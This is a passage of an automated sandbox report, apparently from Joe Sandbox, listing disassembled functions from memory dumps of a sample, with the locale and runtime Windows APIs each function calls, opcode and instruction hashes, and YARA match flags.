                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004123A0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 7299cbe181a480e96aa1d0823b8b75374db67f9795f27445fcbabf9e3bc0ca98
                                                                                                                                                                                                                                                                                        • Instruction ID: 57b2c8c2af9200c539743d1e838558d093200d52225ae661a65c97ab255a42b1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7299cbe181a480e96aa1d0823b8b75374db67f9795f27445fcbabf9e3bc0ca98
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04212607 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 331f1b043438bf50c0d0bb34769695c962d67a9a75435153f21e753d807b965d
                                                                                                                                                                                                                                                                                        • Instruction ID: ecfd1169dd1db74fa8b1fbb545b0aaa264cace438e4dc3e6548e63d18cfefdb9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 331f1b043438bf50c0d0bb34769695c962d67a9a75435153f21e753d807b965d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B024C71E1021ADFDF14CFA9D8806AEB7F1EF58314F2581AAE819F7254D730A941CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041B84B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B846,?,?,00000008,?,?,0042362F,00000000), ref: 0041BA78
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                                                                        • Instruction ID: 0c2c29198f1904db5ab12468f0c2f7b68f4f63301914c53b8217cadea3e25972
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CB17E716206088FD715CF28C486BA57BE0FF45364F258659E9D9CF3A1C739E982CB84
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421BAB2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0421BAAD,00000000,?,00000008,?,?,04223896,00000000), ref: 0421BCDF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                                                                        • Instruction ID: 1162ccd5f834d0ad7ef49f48cc4747a402a14773fd4cb9f6bd18ae73d0f413ba
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50B106316206099FD719CF28C48AB657FF0EF55364F298658E89ACF2A1C735FA91CB40
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0042069E Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004206F2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                                                                        • Instruction ID: 9cee96005927a1573ed79b1b6da19a4e5e72af736dd4be10e0bf17a0e1069c17
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7421A472610226ABDB249A25EC41BBB77E8EB80314F50017FFD05D6242EB79ED44CB59
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04220905 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FDF
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FEC
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04220959
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                                                                        • Instruction ID: 0230e437f089e8114178956fbe31e12154cc09fc18e699c0e8a6ede9f8e37206
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59218372B21226EBFB24AF24DD41BBA73ACEB44714F1001BAEF06D6150EB75B944CB54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0422058D Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,042145A4,?,04220CE2,00000000,?,?,?), ref: 042205FF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                                                                        • Instruction ID: 4d80bed135c7d7fe63ba070a14b56e44010022ff8f4f861d05ad158c5ef501e5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF1129367103129FDB189F39D8A467AB791FF84358B18442DDA8687A40D7757542CB40
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004208CE Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042066C,00000000,00000000,?), ref: 004208FA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2692324296-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                                                                        • Instruction ID: 95b118f29787940bb019709f183f2c3e5714f1a92d3f33ac24e0601bbd6709b7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03F04E727001257FEB245B1598057BB77A8DB40314F51442AEC47A3242DA38BD81C5D4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04220B35 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,042208D3,00000000,00000000,?), ref: 04220B61
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2692324296-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                                                                        • Instruction ID: 597623751da03b5351dded9ab6284780fe1ef376da17e8897c5fff14d4f10eee
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CF0F432B20127BFDB385A648909BBE7768EB4076CF050569EE05A3140EA74BE41CAD4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04220903 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FDF
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FEC
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04220959
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1663032902-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a5e2e27661e3b7b444401f33bbcec4a2cbcde23cc4fdcda85679ab9cc1de8dfe
                                                                                                                                                                                                                                                                                        • Instruction ID: bea8e67f34b459fe8ca7dabc8046b25e866a1fe30cacf0c488b329f10c28081d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5e2e27661e3b7b444401f33bbcec4a2cbcde23cc4fdcda85679ab9cc1de8dfe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27F0F432B21119ABEB14AB64DC41ABA33ACDB48324F1001BAEB07D7240DA747D05C794
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04220628 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,042145A4,?,04220CA6,042145A4,?,?,?,?,?,042145A4,?,?), ref: 04220674
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                                                                        • Instruction ID: 111c2d1a802d42d99e803310363420413057040959151a279584851cbaa84c3d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4F046363103162FEB249F399C90B7A7BD4EFC032CF55443DFA068B680D6B1A942CA44
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421774B Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,04214002,?,00000004), ref: 0421779E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0fa90c1a792b4f576805d634ceb77212e8dbb6f590b38d2f3a598ff2e07973d6
                                                                                                                                                                                                                                                                                        • Instruction ID: 51e547b94b9a5be3c7095bf7b22b604ba45f689da989c6f56b7f2663d99fdcef
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fa90c1a792b4f576805d634ceb77212e8dbb6f590b38d2f3a598ff2e07973d6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58F0F631741318BBEB11AF61EC01F6E3BA1DF98711F90406AFC05271A0CE716E119689
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00411A06: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,004395B8,00000008,00416B87,?,?,?), ref: 00411A15
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 00417129
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                                                                        • Instruction ID: 132fde00c3026ba385e258918c38b9eec635062562826c8cbc0ed6069a56d62f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2F03131A503009FD714EF69D846B9D37F0EB04714F10512BF514EB2E1CB7849408B49
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04217358 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04211C6D: RtlEnterCriticalSection.NTDLL(?), ref: 04211C7C
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 04217390
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                                                                        • Instruction ID: 3950f85c410afb060048a22cfd5aba0fcba4e054e8c7794f6df81fadba994c04
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3F03C72A603049BE714EF68D845B9D77F0EB08714F10912AE514DB2E1CBB459808F89
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004202DB Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,00420A9D,=CA,?,?,?,?,?,0041433D,?,?,?), ref: 00420312
